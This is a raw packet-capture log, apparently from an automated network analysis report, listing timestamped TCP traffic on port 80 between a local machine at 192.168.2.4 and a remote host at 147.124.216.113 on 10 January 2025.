              Jan 10, 2025 08:59:09.104110003 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104127884 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104135036 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104159117 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104192972 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104202032 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104224920 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104257107 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104269028 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104289055 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104321003 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104343891 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104352951 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104386091 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104398012 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104418993 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104450941 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104459047 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104484081 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104527950 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104533911 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104566097 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104605913 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104612112 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104635000 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104666948 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104691029 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104700089 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104732037 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104756117 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104763985 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104796886 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104813099 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104829073 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104863882 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104870081 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104897022 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104928970 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104943991 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.104963064 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.104996920 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.105004072 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.105037928 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.105070114 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.105083942 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.105103016 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.105135918 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.105159044 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.105170012 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.105214119 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.105220079 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.105262041 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.105314970 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.849387884 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849459887 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849494934 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849528074 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849561930 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849613905 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849648952 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849680901 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849692106 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.849692106 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.849714994 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849765062 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849769115 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.849816084 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849817038 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.849848986 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849889994 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849898100 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.849921942 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.849967003 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.849978924 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850008965 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850047112 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.850073099 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850107908 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850140095 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850164890 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.850172997 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850204945 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850229979 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.850236893 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850270033 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850292921 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.850301981 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850343943 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.850351095 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850383997 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850414991 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850425005 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.850447893 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850478888 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850492954 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.850512028 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850544930 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850558043 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.850578070 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850611925 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850629091 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.850645065 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850677967 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850702047 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.850713968 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850769043 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.850867987 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850900888 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850933075 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850945950 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.850965977 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.850997925 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851022005 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.851030111 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851063013 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851087093 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.851095915 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851129055 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851138115 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.851161003 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851198912 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851221085 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.851227045 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851278067 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.851389885 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851422071 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851454973 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851469040 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.851488113 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851521015 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851545095 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.851552963 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851586103 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851598024 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.851619005 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851651907 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:09.851658106 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:09.901688099 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.717276096 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717335939 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717374086 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717406034 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717439890 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717473984 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717489958 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.717509031 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717541933 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717581987 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717592955 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.717592955 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.717592955 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.717613935 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717648029 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717655897 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.717679977 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717711926 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717724085 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.717746019 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717778921 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717787981 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.717812061 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717849970 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717861891 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.717895985 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717931032 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717947006 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.717963934 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.717997074 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718005896 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.718044996 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718077898 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718091965 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.718110085 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718142986 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718151093 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.718175888 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718209028 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718235970 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.718240976 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718272924 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718278885 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.718306065 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718338966 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718348980 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.718372107 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718405008 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718414068 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.718441010 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718487024 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.718749046 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718780994 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718813896 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718827009 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.718847036 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718880892 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718890905 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.718914032 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718946934 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.718970060 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.718977928 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.719011068 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.719018936 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.719043016 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.719075918 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.719091892 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.719108105 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.719140053 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.719146013 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.719172955 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.719204903 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.719214916 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.719238043 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.719270945 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.719296932 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.719345093 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.719388008 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:12.719419956 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.719455957 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:12.719499111 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.095850945 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.095922947 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.095959902 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.095993996 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096026897 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096059084 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096093893 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096126080 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096158981 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096168041 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.096191883 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096225977 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096236944 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.096261024 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096271038 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.096293926 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096326113 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096330881 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.096358061 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096385956 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.096393108 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096426964 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096443892 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096460104 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096476078 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096499920 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.096503973 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096519947 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096534014 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096549988 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096564054 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096580029 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096595049 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096601009 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.096611023 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096626997 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096649885 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.096694946 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096709967 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096714973 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.096724033 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096739054 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096752882 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096757889 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.096767902 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096782923 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096796989 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096812010 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096821070 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.096827030 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096843958 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096857071 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.096918106 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.096972942 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.097284079 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097299099 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097312927 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097326994 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097341061 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097352982 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.097356081 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097371101 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097384930 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097399950 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097414017 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097429037 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097443104 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097449064 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.097456932 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097522020 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.097717047 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097733021 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097748041 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097848892 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097852945 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:18.097867012 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:18.097944975 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.249912977 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.249944925 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.249960899 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.249974966 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.249990940 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.249991894 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.250005007 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250020981 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250027895 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.250047922 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.250080109 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250094891 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250108957 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250116110 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.250144958 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.250230074 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250267982 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250282049 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250297070 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250298977 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.250328064 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.250361919 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250457048 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250471115 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250484943 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250488043 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.250499964 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250514030 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250519991 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.250528097 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250541925 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250551939 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.250579119 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.250912905 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250926971 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250941038 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250955105 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250958920 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.250968933 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250983000 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.250991106 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.250998020 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251013041 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251019001 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.251051903 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.251192093 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251207113 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251219988 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251234055 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251238108 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.251247883 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251262903 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251266003 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.251296997 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.251533031 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251547098 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251560926 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251574993 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251581907 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.251589060 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251602888 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251614094 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.251616955 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251631021 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251643896 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.251645088 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251658916 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251661062 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.251673937 CET8049736147.124.216.113192.168.2.4
